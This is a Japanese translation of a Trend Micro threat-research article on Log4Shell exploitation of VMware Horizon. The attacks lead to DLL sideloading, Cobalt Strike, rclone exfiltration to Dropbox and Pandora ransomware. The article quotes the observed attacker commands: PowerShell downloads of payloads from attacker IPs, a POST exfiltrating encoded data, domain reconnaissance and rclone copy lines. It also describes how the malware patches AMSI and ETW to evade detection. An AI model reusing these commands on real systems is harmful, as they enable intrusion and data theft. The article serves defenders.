脆弱性「Log4Shell」によりVMware製品において情報漏えいやランサムウェアの被害が発生｜トレンドマイクロ

トレンドマイクロでは、VMware社の仮想化ソフトウェア製品VMware Horizonの特定のバージョンで、脆弱性Log4Shellが悪用された攻撃事例を解析しました。これらの攻撃事例は、感染端末へ情報漏えいの被害をもたらす結果となっていました。しかも一部の端末では、情報漏えいから数日後にランサムウェアに感染していたことも判明しました。

トレンドマイクロでは、VMware社の仮想化ソフトウェア製品VMware Horizonの特定のバージョンにおいて、脆弱性Log4Shellの悪用による攻撃事例を確認し、解析を行ないました。一連の攻撃事例を調査した結果、これらの多くは、感染端末からの情報漏えいを伴うことが分かりました。しかも一部のケースでは、情報漏えいの数日後にランサムウェアに感染していたことも判明しました。

この調査は、セキュリティ機関Sentinel Labsの最近のレポートにも関連しており、同レポートでは、VMwareのコマンドラインユーティリティを利用したランサムウェアLockBitによるサービスとしてのランサムウェア（RaaS）の手法について言及しています。さらにこのユーティリティを通じてDLLサイドローディングの影響を受けやすいことも示されていました。

トレンドマイクロでも、エントリポイントやサイドローディングについては、Sentinel Labsと同様の挙動を確認しました。そして本稿では、特に情報漏えいおよび水平移動・内部活動に関連する手法について説明します。

攻撃のキルチェーンについて

侵入箇所

この攻撃は、VMware Horizonに存在するJava向けのログ出力ライブラリ「Apache Log4j」の脆弱性（Log4Shellと呼ばれる）の悪用から始まります。その後、PowerShellコマンド実行のためのインスタンスを生成します。攻撃者は、PowerShellコマンドを使用して攻撃対象のネットワークを検出し、mfeann.exe、LockDown.DLL、c0000012.logのファイルをダウンロードします。使用されるコマンドは、以下のとおりです。

net group /domain
whoami

c:windowssystem32 et group /domain
c:windowssystem32 ltest /domain_trusts
c:windowssystem32 et user StantoDe /domain
c:windowssystem32 et time /domain

Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/mfeann.exe -OutFile
C:\users\public\mfeann.exe
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/LockDown.DLL -OutFile
C:\users\public\LockDown.DLL
Invoke-WebRequest -uri hxxp://45[.]32.108.54:443/c0000012.log -OutFile
C:\users\public\c0000012.log

トレンドマイクロで解析したケースでは、不正なDLLをサイドローディングする際に使用された異なるファイルが確認されました。例えば、イベント作成とロギングを担当する実行ファイルmfeann.exeが挙げられます。このファイルは、よく知られたセキュリティ企業の署名による正規の実行ファイルですが、これを悪用することでLockDown.DLLという名称の不正なDLLをサイドロードしていたことが確認されました。別のケースでは、VMwareXferlog.exeという正規の実行ファイルをダウンロードし、同様の手法で不正なDLL glib-2.0.DLLをサイドローディングしていました。

さらに以下の動作について説明します。

Invoke-WebRequest -uri http://45.61.139.38/VMwareXferlogs.exe -OutFile
c:programdataVMwareXferlogs.exe;
Invoke-WebRequest -uri http://45.61.139.38/glib-2.0.DLL -OutFile
c:programdataglib-2.0.DLL;
Invoke-WebRequest -uri http://45.61.139.38/vmtools.ini -OutFile
c:programdatamtools.ini

下図は、VMware HorizonにおけるLog4jの脆弱性を悪用することで、PowerShell経由でVMwareユーティリティと不正なDLL（ファイル名：VMwareXferlog.exeとglib-2.0.DLL）をダウンロードするステップを示したものです。

図3：感染に至るプロセスチェーン（「Trend Micro Vision One」の表示画面から）

DLLサイドローディングの詳細

今回確認されたサイドローディングの挙動は、先に説明した手順の後に実行されます。攻撃者は、Log4jの脆弱性を悪用し、mfeann.exe、LockDown.DLL、c0000012.logといったファイルをダウンロードしました。

そしてmfeann.exeが実行され、LockDown.DLLから関数LockDownProtectProcessByIdを呼び出します。これにより、LockDown.DLL内の不正なペイロードが行使されます。以下がそのプロセスを示しています。

powershell -c curl -uri hxxp://45[.]61.137.57:80 -met POST -Body
([System.Convert]ToBase64String(([System.Text.Encoding]ASCII.GetBytes
((C:\users\public\mfeann.exe)))))

図4：関数LockDownProtectProcessByIdの呼び出しにより、不正なLockDown.DLLでペイロードが遂行される手順

こうして「武器化」されたDLLは、感染端末内にデバッガが存在するかをチェックし、MDR（Managed Detection and Response）およびMicrosoftのAMSI（Antimalware Scan Interface）による検出を回避しようと試みます。そしてc0000012.logを解読した上で、CobaltStrikeによるペイロードを生成します。Sentinel Labsのレポートではこの点を詳細に解析しています。

この動作の詳細は、以下のとおりとなります。

1. アンチデバッギング手法により、PEB構造体内のBeingDebuggedフラグをチェックする

2. 次にAMSIとMicrosoft のイベント追跡の回避を試みます。この場合、EtwEventWriteおよびAmsiScanBuffer APIに対して「プロシージャからの戻り値（RET）」の命令によって修正パッチを適用することにより、Event Tracing for Windows（ETW）およびAMSIでの検出回避を試みます。EtwEventWriteとAmsiScanBufferの両方にパッチを適用する際には、以下の関数を使用します。

図7と図8は、修正パッチ適用前後のEtwEventWriteの状態を示したものです。

図8：戻り値命令（0xC3）で修正パッチを適用した後のEtwEventWrite

3. そして最後に、ローダが暗号化されたCobaltStrikeペイロードのマッピング、復号、読み込みを開始します。

注目すべき手法やツールについて

同一のローダを使用

上述の2つのケースでは、それぞれmfeann.exeとLockDown.DLL、VMwareXferlog.exeとglib-2.0.DLLを突いた侵入経路でしたが、利用されたローダは、双方とも同一のものでした。

JP-Image11 — 図11：LockDown.DLLを使用するケース１とglib-2.0.DLLを使用するケース２では同一のローダが使用されていた

永続化

また、生成された WerFault.exe が lsass.exe にアクセスしていることから、認証情報がダンプされた可能性もあります。攻撃者は、既存のアカウントをドメイン管理者グループに追加することで、ターゲットの環境での永続化を試みていました。

ネットワーク内で他の端末への水平移動・内部活動

Cobalt Strikeによる最初の感染後、Githubで入手可能の密航型プロキシツールnode.exeの作成も確認されました。このツールはGO言語で書かれており、リモートシェル実行、ファイルのアップロード/ダウンロードなど、多くの機能を備えています。今回のケースでは、このツールを使用して「IP: 45[.]32.108.54」上の攻撃者に80番ポートを介したリバースシェルを提供していました。

コマンド＆コントロール（C&C）のIPと接続が成功した後、SMBとWMIを介して複数の内部端末へのアウトバウンドトラフィックが確認されました。こうして、mfeann.exe、Lockdown.DLL、 update.exe （node.exe ツールを介してアクセス）などのファイルが特定の端末上に作成されました。

情報送出

また、あるケースでは「update.exe」という名称の興味深いバイナリファイルが見つかりました。このファイルは、実際は、Dropboxの特定の場所に情報を送出するツール「rclone.exe」でした。そしてこのツールは、下記に示されたとおり、時間経過とともに異なるIPにアップロードする機能を備えています。

162.125.1[.]14 (Dropbox, Inc.)
162.125.1[.]19 (Dropbox, Inc.)
162.125.2[.]14 (Dropbox, Inc.)
162.125.2[.]19 (Dropbox, Inc.)
162.125.7[.]14 (Dropbox, Inc.)
162.125.7[.]19 (Dropbox, Inc.)

CLI command:

cmd.exe /Q /c update.exe copy J: 4:1 -q –ignore-existing –max-age 2y - -
exclude *.exe 1> \127.0.0.1\ADMIN$__1649006901.3590112 2>&1
cmd.exe /Q /c update.exe copy L: 4:2 -q –ignore-existing –max-age 2y - -
exclude *.exe 1> \127.0.0.1\ADMIN$__1649007703.966517 2>&1
cmd.exe /Q /c update.exe copy Q: 4:3 -q –ignore-existing –max-age 2y - -
exclude *.exe 1> \127.0.0.1\ADMIN$__1649007856.0151849 2>&1

さらに別のケースでは、同じツールが「Medias.exe」というファイル名で情報送出に使用されていました。

Medias.exe copy ‘[Private IP] \G$’ dropbox:ag -q –ignore-existing – max-age
2y –auto-confirm –multi-thread-streams 12 –transfers 10 –ignore-errors –
exclude “*.{mp4,exe,DLL,log,mov,avi,db,ini,lnk}”

情報送出後の活動

今回解析したほとんどの事例では、情報送出後の段階で活動停止を確認しました。しかし、ある事例では、情報送出から10日後にランサムウェアPandoraによる感染が発覚したケースも確認しました。

一連の流れをまとめると次のとおりとなります。まず、ユーティリティVMwareXferlog.exeを介して不正なDLLがサイドロードされた後、密航型ハッキングツールが作成されます。その後さらに、Rcloneツール（update.exe）が作成され、情報送出に至るという流れです。また場合によっては、10日後、ランサムウェアPandoraの検出を確認しました。

攻撃段階

JP-Image14 — 図14：調査事例に基づく情報送出およびランサムウェア感染のタイムライン

トレンドマイクロでは、情報送出からランサムウェア感染までの期間が長いことから、情報送出後にランサムウェア攻撃グループにアクセス権を売却する攻撃者が存在するのではないかと推測しています。アクセス権の販売は、サイバー犯罪アンダーグラウンド市場では珍しいことではありません。ある攻撃者が活動を終えると、被害者への侵入経路を他の攻撃グループへ売り渡すことで利益が得られるからです。

最近確認されたローダについて

トレンドマイクロでは、LockDown.DLL および glib-2.0.DLL に類似したローダを調査していたところ、2022年6月22日に Virus Total に提出された同様のローダを確認しました。このローダは、ツールmfeann.exeを介して不正なLockDown.DLLをサイドロードするものでした。入手した検体では、Log4jの脆弱性の悪用でなく、.Net向けのトロイの木馬型マルウェア「UnLockApps.exe」を駆使してファイル作成が実行されていました。

このマルウェアは、%appdata% \MfeannP1ugins の場所に以下の3つのファイルを作成していました。

mfeann.exe: 不正なLockDown.dllをサイドロードするツール
LockDown.dll：不正なDLL
avupdate_msg.avr: 暗号化されたcobalt strikeのペイロード

このLockDown.dllの検体は、最近（2022年6月5日）作成されたものですが、機能自体は、上述した旧来の検体ほど複雑ではなく、例えば、デバッガ環境のチェックや、セキュリティ監視ソリューションの回避といった機能は備えていませんでした。

一方、この検体も、暗号化されたファイルを読み込み、それを復号した上で、Cobalt上の文字列でペイロードを生成する点では旧来の検体と同じ機能を有しています。

トレンドマイクロのソリューション

不正なコンポーネントや不審な動作を検出するセキュリティ技術を備えた以下のような多層的なアプローチにより、企業や組織は、今回のようなランサムウェアやその他の攻撃を阻止することができます。

「Trend Micro Vision One™」は、多層防御と挙動監視を提供し、ランサムウェアが不可逆的な損害をもたらす前に、不審な挙動やツールを早期にブロックすることが可能です。
「Trend Micro Cloud One™ Workload Security」は、脆弱性を悪用する既知および未知の脅威を阻止します。こうした防御は、仮想パッチや機械学習などの技術によって実現されます。
「Trend Micro™ Deep Discovery™ Email Inspector」は、カスタムサンドボックスと高度な解析技術により、ランサムウェアの侵入口となるフィッシングメールなどの不正なメールを効果的にブロックします。
「Trend Micro Apex One™」は、ファイルレスの脅威やランサムウェアなどの高度な懸念に対して、次世代レベルの自動検知と対応を実現し、エンドポイントの防御を確実なものとします。

感染の痕跡

本記事の感染の痕跡（IOC）は、こちらをご参照ください。

MITRE ATT&CK

参考記事：
• 「Log4Shell Vulnerability in VMware Leads to Data Exfiltration and Ransomware」
By: Mohamed Fahmy

翻訳：与那城務（Core Technology Marketing, Trend Micro™ Research）

タグ

脆弱性「Log4Shell」によりVMware製品において情報漏えいやランサムウェアの被害が発生